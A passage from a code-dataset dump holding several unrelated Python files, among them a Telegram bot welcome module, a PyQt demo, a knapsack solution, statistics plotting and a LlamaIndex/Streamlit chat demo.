= update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: в текущем сообщении есть неправильные URL-адреса. \"\n \"Пожалуйста обновите.\"),\n parse_mode=ParseMode.MARKDOWN)\n LOGGER.warning(message)\n LOGGER.warning(keyboard)\n LOGGER.exception(\"Не удалось разобрать! получил неверный URL-адрес хоста\")\n else:\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание. Произошла ошибка при отправке \"\n \"персонализированного сообщения. Пожалуйста, обновите.\"),\n parse_mode=ParseMode.MARKDOWN)\n LOGGER.exception()\n\n return msg\n\n\n@run_async\n@bot_can_delete\ndef new_member(bot: Bot, update: Update):\n chat = update.effective_chat # type: Optional[Chat]\n should_welc, cust_welcome, welc_type = sql.get_welc_pref(chat.id)\n if should_welc:\n sent = None\n new_members = update.effective_message.new_chat_members\n for new_mem in new_members:\n # Give the owner a special welcome\n user_id = new_mem.id\n name = new_mem.first_name\n if sql_ban.is_user_gbanned(user_id):\n update.effective_chat.kick_member(user_id)\n update.effective_message.reply_text(f\"@{new_mem.username} Это плохой человек, их здесь не должно быть!\")\n else:\n if name == None:\n name = new_mem.last_name\n try:\n if chat.id == CHAT_ID:\n sql_top.get_user_top(user_id, name)\n except:\n pass\n if new_mem.id == OWNER_ID:\n update.effective_message.reply_text(\"Создатель в доме, давай начнем эту вечеринку!\")\n continue\n\n # Don't welcome yourself\n elif new_mem.id == bot.id:\n continue\n\n else:\n # If welcome message is media, send with appropriate function\n if welc_type != sql.Types.TEXT and welc_type != sql.Types.BUTTON_TEXT:\n ENUM_FUNC_MAP[welc_type](chat.id, cust_welcome)\n return\n # else, move on\n first_name = new_mem.first_name or \"PersonWithNoName\" # edge case of empty name - occurs for some bugs.\n\n if cust_welcome:\n if new_mem.last_name:\n fullname = \"{} {}\".format(first_name, new_mem.last_name)\n else:\n fullname = first_name\n count = chat.get_members_count()\n mention = mention_markdown(new_mem.id, first_name)\n if new_mem.username:\n username = \"@\" + escape_markdown(new_mem.username)\n else:\n username = mention\n\n valid_format = escape_invalid_curly_brackets(cust_welcome, VALID_WELCOME_FORMATTERS)\n res = valid_format.format(first=escape_markdown(first_name),\n last=escape_markdown(new_mem.last_name or first_name),\n fullname=escape_markdown(fullname), username=username, mention=mention,\n count=count, chatname=escape_markdown(chat.title), id=new_mem.id)\n buttons = sql.get_welc_buttons(chat.id)\n keyb = build_keyboard(buttons)\n else:\n res = sql.DEFAULT_WELCOME.format(first=first_name)\n keyb = []\n\n keyboard = InlineKeyboardMarkup(keyb)\n sent = send(update, res, keyboard,\n sql.DEFAULT_WELCOME.format(fullname=fullname, chatname=chat.title)) # type: Optional[Message]\n\n prev_welc = sql.get_clean_pref(chat.id)\n if prev_welc:\n try:\n bot.delete_message(chat.id, prev_welc)\n except BadRequest as excp:\n pass\n\n if sent:\n sql.set_clean_welcome(chat.id, sent.message_id)\n\n\n@run_async\ndef left_member(bot: Bot, update: Update):\n chat = update.effective_chat # type: Optional[Chat]\n \n should_goodbye, cust_goodbye, goodbye_type = sql.get_gdbye_pref(chat.id)\n if should_goodbye:\n left_mem = update.effective_message.left_chat_member\n user_id = left_mem.id\n try:\n sql_top.delete_user_top(user_id)\n except:\n pass\n if left_mem:\n # Ignore bot being kicked\n if left_mem.id == bot.id:\n return\n\n # Give the owner a special goodbye\n if left_mem.id == OWNER_ID:\n update.effective_message.reply_text(\"RIP юзер\")\n return\n\n # if media goodbye, use appropriate function for it\n if goodbye_type != sql.Types.TEXT and goodbye_type != sql.Types.BUTTON_TEXT:\n ENUM_FUNC_MAP[goodbye_type](chat.id, cust_goodbye)\n return\n\n first_name = left_mem.first_name or \"PersonWithNoName\" # edge case of empty name - occurs for some bugs.\n if cust_goodbye:\n if left_mem.last_name:\n fullname = \"{} {}\".format(first_name, left_mem.last_name)\n else:\n fullname = first_name\n count = chat.get_members_count()\n mention = mention_markdown(left_mem.id, first_name)\n if left_mem.username:\n username = \"@\" + escape_markdown(left_mem.username)\n else:\n username = mention\n\n valid_format = escape_invalid_curly_brackets(cust_goodbye, VALID_WELCOME_FORMATTERS)\n res = valid_format.format(first=escape_markdown(first_name),\n last=escape_markdown(left_mem.last_name or first_name),\n fullname=escape_markdown(fullname), username=username, mention=mention,\n count=count, chatname=escape_markdown(chat.title), id=left_mem.id)\n buttons = sql.get_gdbye_buttons(chat.id)\n keyb = build_keyboard(buttons)\n\n else:\n res = sql.DEFAULT_GOODBYE\n keyb = []\n keyboard = InlineKeyboardMarkup(keyb)\n send(update, res, keyboard, sql.DEFAULT_GOODBYE)\n\n\n@run_async\n@user_admin\ndef welcome(bot: Bot, update: Update, args: List[str]):\n chat = update.effective_chat # type: Optional[Chat]\n # if no args, show current replies.\n if len(args) == 0 or args[0].lower() == \"noformat\":\n noformat = args and args[0].lower() == \"noformat\"\n pref, welcome_m, welcome_type = sql.get_welc_pref(chat.id)\n update.effective_message.reply_text(\n \"В этом чате параметр приветствия установлен на: `{}`. \\n*Приветственное сообщение \"\n \"(не заполняя {{}}):*\".format(pref),\n parse_mode=ParseMode.MARKDOWN)\n\n if welcome_type == sql.Types.BUTTON_TEXT:\n buttons = sql.get_welc_buttons(chat.id)\n if noformat:\n welcome_m += revert_buttons(buttons)\n update.effective_message.reply_text(welcome_m)\n\n else:\n keyb = build_keyboard(buttons)\n keyboard = InlineKeyboardMarkup(keyb)\n\n send(update, welcome_m, keyboard, sql.DEFAULT_WELCOME)\n\n else:\n if noformat:\n ENUM_FUNC_MAP[welcome_type](chat.id, welcome_m)\n\n else:\n ENUM_FUNC_MAP[welcome_type](chat.id, welcome_m, parse_mode=ParseMode.MARKDOWN)\n\n elif len(args) >= 1:\n if args[0].lower() in (\"on\", \"yes\"):\n sql.set_welc_preference(str(chat.id), True)\n update.effective_message.reply_text(\"Буду вежливым!\")\n\n elif args[0].lower() in (\"off\", \"no\"):\n sql.set_welc_preference(str(chat.id), False)\n update.effective_message.reply_text(\"Я дуюсь, больше не здороваюсь.\")\n\n else:\n # idek what you're writing, say yes or no\n update.effective_message.reply_text(\"Я понимаю только 'on/yes' или 'off/no'!\")\n\n\n@run_async\n@user_admin\ndef goodbye(bot: Bot, update: Update, args: List[str]):\n chat = update.effective_chat # type: Optional[Chat]\n\n if len(args) == 0 or args[0] == \"noformat\":\n noformat = args and args[0] == \"noformat\"\n pref, goodbye_m, goodbye_type = sql.get_gdbye_pref(chat.id)\n update.effective_message.reply_text(\n \"В этом чате параметр прощания установлен на: `{}`. \\n*Прощальное сообщение \"\n \"(не заполняя {{}}):*\".format(pref),\n parse_mode=ParseMode.MARKDOWN)\n\n if goodbye_type == sql.Types.BUTTON_TEXT:\n buttons = sql.get_gdbye_buttons(chat.id)\n if noformat:\n goodbye_m += revert_buttons(buttons)\n update.effective_message.reply_text(goodbye_m)\n\n else:\n keyb = build_keyboard(buttons)\n keyboard = InlineKeyboardMarkup(keyb)\n\n send(update, goodbye_m, keyboard, sql.DEFAULT_GOODBYE)\n\n else:\n if noformat:\n ENUM_FUNC_MAP[goodbye_type](chat.id, goodbye_m)\n\n else:\n ENUM_FUNC_MAP[goodbye_type](chat.id, goodbye_m, parse_mode=ParseMode.MARKDOWN)\n\n elif len(args) >= 1:\n if args[0].lower() in (\"on\", \"yes\"):\n sql.set_gdbye_preference(str(chat.id), True)\n update.effective_message.reply_text(\"Мне будет жаль, когда люди уйдут!\")\n\n elif args[0].lower() in (\"off\", \"no\"):\n sql.set_gdbye_preference(str(chat.id), False)\n update.effective_message.reply_text(\"Они уходят, они мертвы для меня.\")\n\n else:\n # idek what you're writing, say yes or no\n update.effective_message.reply_text(\"Я понимаю только 'on/yes' или 'off/no'!\")\n\n\n@run_async\n@user_admin\n@loggable\ndef set_welcome(bot: Bot, update: Update) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n\n text, data_type, content, buttons = get_welcome_type(msg)\n\n if data_type is None:\n msg.reply_text(\"Вы не указали, чем отвечать!\")\n return \"\"\n\n sql.set_custom_welcome(chat.id, content or text, data_type, buttons)\n msg.reply_text(\"Пользовательское приветственное сообщение успешно настроено!\")\n\n return \"{}:\" \\\n \"\\n#SET_WELCOME\" \\\n \"\\nAdmin: {}\" \\\n \"\\nУстановите приветственное сообщение.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n\n\n@run_async\n@user_admin\n@loggable\ndef reset_welcome(bot: Bot, update: Update) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n sql.set_custom_welcome(chat.id, sql.DEFAULT_WELCOME, sql.Types.TEXT)\n update.effective_message.reply_text(\"Успешно сброшено приветственное сообщение по умолчанию!\")\n return \"{}:\" \\\n \"\\n#RESET_WELCOME\" \\\n \"\\nAdmin: {}\" \\\n \"\\nВосстановить приветственное сообщение по умолчанию.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n\n\n@run_async\n@user_admin\n@loggable\ndef set_goodbye(bot: Bot, update: Update) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n text, data_type, content, buttons = get_welcome_type(msg)\n\n if data_type is None:\n msg.reply_text(\"Вы не указали, что ответить остроумием!\")\n return \"\"\n\n sql.set_custom_gdbye(chat.id, content or text, data_type, buttons)\n msg.reply_text(\"Пользовательское прощальное сообщение успешно настроено!\")\n return \"{}:\" \\\n \"\\n#SET_GOODBYE\" \\\n \"\\nAdmin: {}\" \\\n \"\\nУстановить прощальное сообщениe.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n\n\n@run_async\n@user_admin\n@loggable\ndef reset_goodbye(bot: Bot, update: Update) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n sql.set_custom_gdbye(chat.id, sql.DEFAULT_GOODBYE, sql.Types.TEXT)\n update.effective_message.reply_text(\"Успешно сбросить прощальное сообщение по умолчанию!\")\n return \"{}:\" \\\n \"\\n#RESET_GOODBYE\" \\\n \"\\nAdmin: {}\" \\\n \"\\nСбросить прощальное сообщение.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n\n\n@run_async\n@user_admin\n@loggable\ndef clean_welcome(bot: Bot, update: Update, args: List[str]) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n\n if not args:\n clean_pref = sql.get_clean_pref(chat.id)\n if clean_pref:\n update.effective_message.reply_text(\"Я должен удалить приветственные сообщения два дня назад\")\n else:\n update.effective_message.reply_text(\"В настоящее время я не удаляю старые приветственные сообщения!\")\n return \"\"\n\n if args[0].lower() in (\"on\", \"yes\"):\n sql.set_clean_welcome(str(chat.id), True)\n update.effective_message.reply_text(\"Я попробую удалить старые приветственные сообщения!\")\n return \"{}:\" \\\n \"\\n#CLEAN_WELCOME\" \\\n \"\\nAdmin: {}\" \\\n \"\\nПереключил чистые приветствия на ON.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n elif args[0].lower() in (\"off\", \"no\"):\n sql.set_clean_welcome(str(chat.id), False)\n update.effective_message.reply_text(\"I won't delete old welcome messages.\")\n return \"{}:\" \\\n \"\\n#CLEAN_WELCOME\" \\\n \"\\nAdmin: {}\" \\\n \"\\nПереключил чистые приветствия на to OFF.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n else:\n # idek what you're writing, say yes or no\n update.effective_message.reply_text(\"Я понимаю только 'on/yes' или 'off/no'!\")\n return \"\"\n\n\nWELC_HELP_TXT = \"Приветственные/прощальные сообщения вашей группы можно персонализировать разными способами. Если вам нужны сообщения \"\\\n \"для индивидуальной генерации, как и приветственное сообщение по умолчанию, вы можете использовать * эти * переменные:\\n\" \\\n \" - `{{first}}`: это представляет пользователя *first* имя\\n\" \\\n \" - `{{last}}`: это представляет пользователя *last*. По умолчанию *first name*, если у пользователя нет \" \\\n \"last name.\\n\" \\\n \" - `{{fullname}}`: это представляет пользователя *full*. По умолчанию * имя *, если у пользователя нет \" \\\n \"last name.\\n\" \\\n \" - `{{username}}`: это представляет пользователя *username*. По умолчанию * упоминание * пользователя\" \\\n \"имя, если нет имени пользователя.\\n\" \\\n \" - `{{mention}}`: это просто * упоминает * пользователя, отмечая его именем.\\n\" \\\n \" - `{{id}}`: это представляет пользователя *id*\\n\" \\\n \" - `{{count}}`: это представляет пользователя *member number*.\\n\" \\\n \" - `{{chatname}}`: это представляет собой *текущее имя чата*.\\n\" \\\n \"\\nКаждая переменная ДОЛЖНА быть окружена символом `{{}}` для замены.\\n\" \\\n \"Приветственные сообщения также поддерживают markdown, поэтому вы можете создавать любые элементы. bold/italic/code/links. \" \\\n \"Кнопки также поддерживаются, так что вы можете сделать свое приветствие потрясающим с помощью красивого вступления. \" \\\n \"кнопки.\\n\" \\\n \"Чтобы создать кнопку, ссылающуюся на ваши правила, используйте это: `[Rules](buttonurl://t.me/{}?start=group_id)`. \" \\\n \"Вы можете даже установить images/gifs/videos/voice сообщения в качестве приветственного сообщения.\".format(dispatcher.bot.username)\n\n\n@run_async\n@user_admin\ndef welcome_help(bot: Bot, update: Update):\n update.effective_message.reply_text(WELC_HELP_TXT, parse_mode=ParseMode.MARKDOWN)\n\n\n# TODO: get welcome data from group butler snap\n# def __import_data__(chat_id, data):\n# welcome = data.get('info', {}).get('rules')\n# welcome = welcome.replace('$username', '{username}')\n# welcome = welcome.replace('$name', '{fullname}')\n# welcome = welcome.replace('$id', '{id}')\n# welcome = welcome.replace('$title', '{chatname}')\n# welcome = welcome.replace('$surname', '{lastname}')\n# welcome = welcome.replace('$rules', '{rules}')\n# sql.set_custom_welcome(chat_id, welcome, sql.Types.TEXT)\n\n\ndef __migrate__(old_chat_id, new_chat_id):\n sql.migrate_chat(old_chat_id, new_chat_id)\n\n\ndef __chat_settings__(chat_id, user_id):\n welcome_pref, _, _ = sql.get_welc_pref(chat_id)\n goodbye_pref, _, _ = sql.get_gdbye_pref(chat_id)\n return \"В этом чате для приветствия установлено значение `{}`.\\n\" \\\n \"А для прощания установлено значение`{}`.\".format(welcome_pref, goodbye_pref)\n\n\n__help__ = \"\"\"\n{}\n\n*Только админам:*\n - /welcome : включить/выключить приветственное сообщение.\n - /welcome: показывает текущие настройки приветствия.\n - /welcome noformat: показывает текущие настройки приветствия, без форматирования - полезно переработать приветственные сообщения!\n - /goodbye -> такое же использование и аргументы, как /welcome.\n - /setwelcome : установить собственное приветственное сообщение. Если используется для ответа на медиа, использует этот медиа.\n - /setgoodbye : установить собственное прощальное сообщение. Если используется для ответа на медиа, использует этот медиа.\n - /resetwelcome: Установить стандартное приветсвенное сообщение.\n - /resetgoodbye: установить стандартное прощальное сообщение..\n - /cleanwelcome : На новом участнике попробуйте удалить предыдущее приветственное сообщение, чтобы избежать спама в чате.\n - /welcomehelp: просмотреть дополнительную информацию о форматировании пользовательских приветственных/прощальных сообщений.\n\"\"\".format(WELC_HELP_TXT)\n\n__mod_name__ = \"Приветствие\\Прощание\"\n\nNEW_MEM_HANDLER = MessageHandler(Filters.status_update.new_chat_members, new_member)\nLEFT_MEM_HANDLER = MessageHandler(Filters.status_update.left_chat_member, left_member)\nWELC_PREF_HANDLER = CommandHandler(\"welcome\", welcome, pass_args=True, filters=Filters.group)\nGOODBYE_PREF_HANDLER = CommandHandler(\"goodbye\", goodbye, pass_args=True, filters=Filters.group)\nSET_WELCOME = CommandHandler(\"setwelcome\", set_welcome, filters=Filters.group)\nSET_GOODBYE = CommandHandler(\"setgoodbye\", set_goodbye, filters=Filters.group)\nRESET_WELCOME = CommandHandler(\"resetwelcome\", reset_welcome, filters=Filters.group)\nRESET_GOODBYE = CommandHandler(\"resetgoodbye\", reset_goodbye, filters=Filters.group)\nCLEAN_WELCOME = CommandHandler(\"cleanwelcome\", clean_welcome, pass_args=True, filters=Filters.group)\nWELCOME_HELP = CommandHandler(\"welcomehelp\", welcome_help)\n\ndispatcher.add_handler(NEW_MEM_HANDLER)\ndispatcher.add_handler(LEFT_MEM_HANDLER)\ndispatcher.add_handler(WELC_PREF_HANDLER)\ndispatcher.add_handler(GOODBYE_PREF_HANDLER)\ndispatcher.add_handler(SET_WELCOME)\ndispatcher.add_handler(SET_GOODBYE)\ndispatcher.add_handler(RESET_WELCOME)\ndispatcher.add_handler(RESET_GOODBYE)\ndispatcher.add_handler(CLEAN_WELCOME)\ndispatcher.add_handler(WELCOME_HELP)\n","repo_name":"evilcatsystem/tgbot","sub_path":"tg_bot/modules/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":27162,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6348290384","text":"import sys\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nclass MainWindow(QWidget):\n def __init__(self):\n super().__init__()\n\n self.checkBox = QCheckBox('Printer', self)\n self.checkBox.move(150, 50)\n self.checkBox.setFont(QFont('Times New Roman', 16))\n self.checkBox.setCursor(Qt.CursorShape.SizeAllCursor)\n self.checkBox.clicked.connect(self.checkBoxClickedHandler)\n self.checkBox.setTristate(True)\n self.checkBox.setCheckState(Qt.CheckState.PartiallyChecked)\n\n self.pushButtonOk = QPushButton('Ok', self)\n self.pushButtonOk.move(100, 100)\n self.pushButtonOk.resize(QSize(100, 100))\n self.pushButtonOk.clicked.connect(self.buttonOkHandler)\n self.pushButtonOk.setFont(QFont('Times New Roman', 16))\n self.pushButtonOk.setCursor(Qt.CursorShape.IBeamCursor)\n\n def buttonOkHandler(self):\n state = self.checkBox.checkState()\n if state == Qt.CheckState.Checked:\n print('Checked')\n elif state == Qt.CheckState.Unchecked:\n print('Unchecked')\n elif state == Qt.CheckState.PartiallyChecked:\n print('Indeterminate')\n\n\n\n\n def checkBoxClickedHandler(self):\n print('Clicked')\n\napp = QApplication(sys.argv)\nmainWindow = MainWindow()\nmainWindow.show()\napp.exec()","repo_name":"dogancantorun8/python-application","sub_path":"PYQT/deneme.py","file_name":"deneme.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19687403202","text":"# SOLUTION :\n# TOP DOWN USING MEMOIZATION\n# Since we have two changing values (capacity and currentIndex) in our recursive \n# function knapsackRecursive(), we can use a two-dimensional array to store the results of all the solved sub-problems.\n# As mentioned above, we need to store results for every sub-array (i.e., for every possible index ‘i’) and every possible capacity ‘c.’\n\n\n\ndef solve_knapsack(profits, weights, capacity):\n\n dp = [[-1 for x in range(capacity + 1)] for y in range(len(profits))]\n\n return recursive_knapsack(dp, profits, weights, capacity, 0)\n\ndef recursive_knapsack(dp, profits, weights, capacity, currentIndex):\n\n #base check\n\n if capacity <= 0 or currentIndex >= len(profits):\n return 0\n\n # check if a value has been calculated and memoized in dp\n\n if dp[currentIndex][capacity] != -1:\n return dp[currentIndex][capacity]\n\n profits1 = 0\n\n if weights[currentIndex] <= capacity:\n profits1 = profits[currentIndex] + recursive_knapsack(dp, profits, weights, capacity - weights[currentIndex],currentIndex + 1)\n\n profits2 = recursive_knapsack(dp, profits, weights, capacity, currentIndex + 1)\n\n dp[currentIndex][capacity] = max(profits1, profits2)\n\n return dp[currentIndex][capacity] \n\n\ndef main():\n print(solve_knapsack([1 ,6, 10, 16], [1, 2, 3 ,5], 7))\n print(solve_knapsack([1, 6, 10, 16], [1, 2, 3, 5], 6))\n\nmain()\n\n\n# Time and Space complexity#\n# Since our memoization array dp[profits.length][capacity+1] stores the results for all subproblems, we can conclude that we will not have more than N*C\n# subproblems (where ‘N’ is the number of items and ‘C’ is the knapsack capacity). This means that our time complexity will be O(N*C)\n\n# The above algorithm will use O(N*C)\n# space for the memoization array. Other than that, we will use O(N)\n# space for the recursion call-stack. So the total space complexity will be O(N*C + N)\n# , which is asymptotically equivalent to O(N*C).\n","repo_name":"BethMwangi/alogos-datastructures","sub_path":"knapsack_topdown.py","file_name":"knapsack_topdown.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17236286046","text":"# Plot figure 4.2\n\nimport matplotlib.pyplot as plt\nimport statsmodels.formula.api as smf\nimport statsmodels.api as sm\nfrom statsmodels import datasets\nimport pandas as pd\nimport numpy as np\n\ndefault = datasets.get_rdataset('Default', 'ISLR').data\n\ndefault['default_cat'] = default.apply(lambda x: int(x['default'] == 'Yes'),\n axis=1)\n\nlinear_model = smf.ols(formula='default_cat ~ balance', data=default)\nlinear_fit = linear_model.fit()\n\nbalance_xx = np.linspace(default['balance'].min(), default['balance'].max())\n\nfig = plt.figure(figsize=(8,4))\nax1 = fig.add_subplot(121)\ndefault.plot(x='balance', y='default_cat', kind='scatter', alpha=0.5, ax=ax1,\n color='brown')\nax1.plot(balance_xx, linear_fit.predict(exog=dict(balance=balance_xx)), c='b',\n linestyle='--')\nax1.axhline(y=0, linestyle='--', color='grey')\nax1.axhline(y=1, linestyle='--', color='grey')\nax1.set_xlabel('Balance')\nax1.set_ylabel('Probability of Default')\n\nlogit_model = smf.logit(formula='default_cat ~ balance', data=default)\nlogit_fit = logit_model.fit()\n\nax2 = fig.add_subplot(122)\ndefault.plot(x='balance', y='default_cat', kind='scatter', alpha=0.5, ax=ax2,\n color='brown')\nax2.plot(balance_xx, logit_fit.predict(exog=dict(balance=balance_xx)), c='b',\n linestyle='--')\nax2.axhline(y=0, linestyle='--', color='grey')\nax2.axhline(y=1, linestyle='--', color='grey')\nax2.set_xlabel('Balance')\nax2.set_ylabel('Probability of Default')\n\nfig.tight_layout()\n","repo_name":"gurbuxanink/Python-Companion-to-ISLR","sub_path":"code/chap4/probDef.py","file_name":"probDef.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44792185970","text":"import sys\n\ninput = sys.stdin.readline\n\nn = int(input())\na = [1]\nb = [0]\n\nfor i in range(n):\n a.append(b[i])\n b.append(b[i] + a[i])\n\nprint(a[-1], end=' ')\nprint(b[-1])\n","repo_name":"sky980221/Algorithm","sub_path":"9625_BABBA/BABBA.py","file_name":"BABBA.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72540420569","text":"squares = []\n\nfor x in range(10):\n squares.append(x*x)\n\n# 기말고사 내기 딱 좋은 문제\nsquares = [x*x for x in range(10) if x % 2 == 0]\n\nprices = [135, -545, 922, 356, -992, 217]\nmprices = [i if i > 0 else 0 for i in prices]\nprint(mprices)\n\nwords = [\"All\", \"good\", \"things\", \"must\", \"come\", \"to\", \"an\", \"end.\"]\nletters = [ w[0] for w in words ]\nprint(letters)\n\nnumbers = [x+y for x in ['a','b','c'] for y in ['x','y','z']]\nprint(numbers)\n\n\n","repo_name":"DAWUNJUNG/python_programming","sub_path":"week_9/11.list_ham.py","file_name":"11.list_ham.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21519333637","text":"import os\nimport json\nfrom urllib.parse import urlparse\nimport streamlit as st\nfrom scrape_utils import scrape\nfrom llama_index import download_loader, GPTSimpleVectorIndex, SimpleDirectoryReader, ServiceContext, LLMPredictor, PromptHelper\nfrom llama_index.llm_predictor.chatgpt import ChatGPTLLMPredictor\nfrom llama_index.node_parser import SimpleNodeParser\nfrom langchain import OpenAI\nfrom langchain.agents import Tool\nfrom langchain.agents import initialize_agent\nfrom langchain.chains.conversation.memory import ConversationBufferMemory\nfrom llama_index.langchain_helpers.memory_wrapper import GPTIndexChatMemory\n\nindex_name = \"./index.json\"\ndocuments_folder = \"./documents\"\n\ndef get_index_name(input_urls):\n basepoints = input_urls.split('\\n')\n index_name = \"\"\n for basepoint in basepoints:\n index_name += urlparse(basepoint).netloc.split(\".\")[0] + \"&\"\n return index_name\n \n\ndef load_documents_to_gpt_vectorstore(input_urls):\n index_name = get_index_name(input_urls)\n if os.path.exists(\"../index/\"+index_name+\".json\"):\n print(\"index found\")\n return GPTSimpleVectorIndex.load_from_disk(\"../index/\"+index_name+\".json\")\n else:\n print(\"building new index\")\n basepoints = input_urls.split('\\n')\n endpoints = scrape(basepoints)\n BeautifulSoupWebReader = download_loader(\"BeautifulSoupWebReader\")\n loader = BeautifulSoupWebReader()\n documents = loader.load_data(endpoints)\n parser = SimpleNodeParser()\n \n nodes = parser.get_nodes_from_documents(documents)\n llm_predictor = LLMPredictor(\n llm=OpenAI(temperature=0, model_name=\"text-davinci-003\")\n )\n \n max_input_size = 4096\n num_output = 2048\n max_chunk_overlap = 20\n prompt_helper = PromptHelper(max_input_size, num_output, max_chunk_overlap)\n service_context = ServiceContext.from_defaults(llm_predictor=llm_predictor, prompt_helper=prompt_helper)\n index = GPTSimpleVectorIndex(nodes, service_context=service_context)\n index.save_to_disk(\"../index/\"+index_name+\".json\")\n return index\n\ndef build_conversation(urls):\n index_name = get_index_name(urls)\n if not os.path.exists(\"../index/\"+index_name+\".json\"):\n return \"index not found, click on 'load documents' first\"\n else: print(\"index found\")\n index = GPTSimpleVectorIndex.load_from_disk(\"../index/\"+index_name+\".json\")\n tools = [\n Tool(\n name = \"GPT Index\",\n func=lambda q: str(index.query(q)),\n description=\"useful for when you want to answer questions about the author. The input to this tool should be a complete english sentence.\",\n return_direct=True\n ),\n ]\n memory = GPTIndexChatMemory(\n index=index, \n memory_key=\"chat_history\", \n query_kwargs={\"response_mode\": \"compact\"},\n # return_source returns source nodes instead of querying index\n return_source=True,\n # return_messages returns context in message format\n return_messages=True\n )\n llm=OpenAI(temperature=0, model_name=\"text-davinci-003\")\n st.session_state.agent_chain = initialize_agent(tools, llm, agent=\"conversational-react-description\", memory=memory)\n\ndef chat(query,urls):\n index_name = get_index_name(urls)\n if not os.path.exists(\"../index/\"+index_name+\".json\"):\n return \"index not found, click on 'load documents' first\"\n else: print(\"index found\")\n index = GPTSimpleVectorIndex.load_from_disk(\"../index/\"+index_name+\".json\")\n tools = [\n Tool(\n name = \"GPT Index\",\n func=lambda q: str(index.query(q)),\n description=\"useful for when you want to answer questions about the author. The input to this tool should be a complete english sentence.\",\n return_direct=True\n ),\n ]\n memory = GPTIndexChatMemory(\n index=index, \n memory_key=\"chat_history\", \n query_kwargs={\"response_mode\": \"compact\"},\n # return_source returns source nodes instead of querying index\n return_source=True,\n # return_messages returns context in message format\n return_messages=True\n )\n llm=OpenAI(temperature=0, model_name=\"text-davinci-003\")\n agent_chain = initialize_agent(tools, llm, agent=\"conversational-react-description\", memory=memory)\n response = agent_chain.run(input=query)\n \n # response = st.session_state.agent_chain.run(input=query)\n return response\n \n\n# loading openai api key from json file\nwith open('../keys_and_tokens.json', 'r') as f:\n data = json.load(f)\n openai_api_key = data.get(\"openai-api-key\")\n if openai_api_key:\n os.environ[\"OPENAI_API_KEY\"] = openai_api_key\n else:\n print(\"openai_api_key not found in JSON file\")\n\n\nst.header(\"LearnWithGPT Demo\")\nst.session_state.agent_chain = None\n\ndoc_input = st.text_area(\"Enter a URL to scrape and index\")\nif st.button(\"load documents\"):\n st.markdown(load_documents_to_gpt_vectorstore(doc_input))\n build_conversation(doc_input)\n \nuser_input = st.text_area(\"ask about the docs\")\nif st.button(\"Ask\"):\n st.write(chat(user_input, doc_input))\n \n\n# @st.cache_resource\n# def initialize_index(index_name, documents_folder):\n# llm_predictor = ChatGPTLLMPredictor()\n# service_context = ServiceContext.from_defaults(llm_predictor=llm_predictor)\n# if os.path.exists(index_name):\n# index = GPTSimpleVectorIndex.load_from_disk(index_name, service_context=service_context)\n# else:\n# documents = SimpleDirectoryReader(documents_folder).load_data()\n# index = GPTSimpleVectorIndex.from_documents(documents, service_context=service_context)\n# index.save_to_disk(index_name)\n\n# return index\n\n\n# @st.cache_data(max_entries=200, persist=True)\n# def query_index(_index, query_text):\n# response = _index.query(query_text)\n# return str(response)\n\n\n# st.title(\"🦙 Llama Index Demo 🦙\")\n# st.header(\"Welcome to the Llama Index Streamlit Demo\")\n# st.write(\"Enter a query about Paul Graham's essays. You can check out the original essay [here](https://raw.githubusercontent.com/jerryjliu/llama_index/main/examples/paul_graham_essay/data/paul_graham_essay.txt). Your query will be answered using the essay as context, using embeddings from text-ada-002 and LLM completions from ChatGPT. You can read more about Llama Index and how this works in [our docs!](https://gpt-index.readthedocs.io/en/latest/index.html)\")\n\n# index = None\n# api_key = st.text_input(\"Enter your OpenAI API key here:\", type=\"password\")\n\n# if api_key:\n# os.environ['OPENAI_API_KEY'] = api_key\n# index = initialize_index(index_name, documents_folder) \n\n\n# if index is None:\n# st.warning(\"Please enter your api key first.\")\n\n# text = st.text_input(\"Query text:\", value=\"What did the author do growing up?\")\n\n# if st.button(\"Run Query\") and text is not None:\n# response = query_index(index, text)\n# st.markdown(response)\n \n# llm_col, embed_col = st.columns(2)\n# with llm_col:\n# st.markdown(f\"LLM Tokens Used: {index.service_context.llm_predictor._last_token_usage}\")\n \n# with embed_col:\n# st.markdown(f\"Embedding Tokens Used: {index.service_context.embed_model._last_token_usage}\")\n","repo_name":"james-310110/LearnWithGPT-deprecated","sub_path":"server/streamlit_demo.py","file_name":"streamlit_demo.py","file_ext":"py","file_size_in_byte":7207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25496764858","text":"from mininet.net import Mininet\nfrom mininet.node import OVSSwitch, Node, Controller, RemoteController\nfrom mininet.cli import CLI\nfrom mininet.log import info, 